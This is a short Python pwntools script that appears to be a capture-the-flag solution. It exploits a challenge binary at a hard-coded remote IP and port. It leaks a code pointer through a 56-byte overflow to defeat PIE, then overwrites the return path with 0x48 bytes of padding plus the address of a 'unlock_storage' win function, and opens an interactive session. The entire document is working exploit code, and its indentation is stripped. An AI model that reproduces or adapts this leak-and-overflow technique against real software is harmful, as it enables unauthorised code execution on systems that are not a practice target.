#!/usr/bin/python3
from pwn import context, args, gdb, ELF, process, u64, log, remote, p64
context.arch = 'amd64'
context.binary = elf = ELF("./patched_trick")
libc = ELF("./glibc/libc.so.6")
gs = '''
continue
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
else:
return process(elf.path)
#p = start()
p = remote("83.136.253.184", 59748)
def main():
p.sendlineafter(b'do? ', b'2')
p.sendafter(b'!!?', b'A' * 56)
p.recvuntil(b'A'*56)
leak = p.recv(24) # Something weird was going on here, thinking fflush caused it
elf.address = u64(leak[:6].ljust(8,b'\x00')) - 0x9b0
log.success(f"PIE base: {hex(elf.address)}")
log.info(f"Win address: {hex(elf.sym.unlock_storage)}")
p.sendlineafter(b'do? ', b'4')
p.sendlineafter(b'do? ', b'3')
p.sendlineafter(b'n):', b'y')
p.sendlineafter(b'be? ', str(0x58).encode())
p.sendafter(b'me? ', b'A' * 0x48 + p64(elf.sym.unlock_storage))
p.interactive()
if __name__ == '__main__':
main()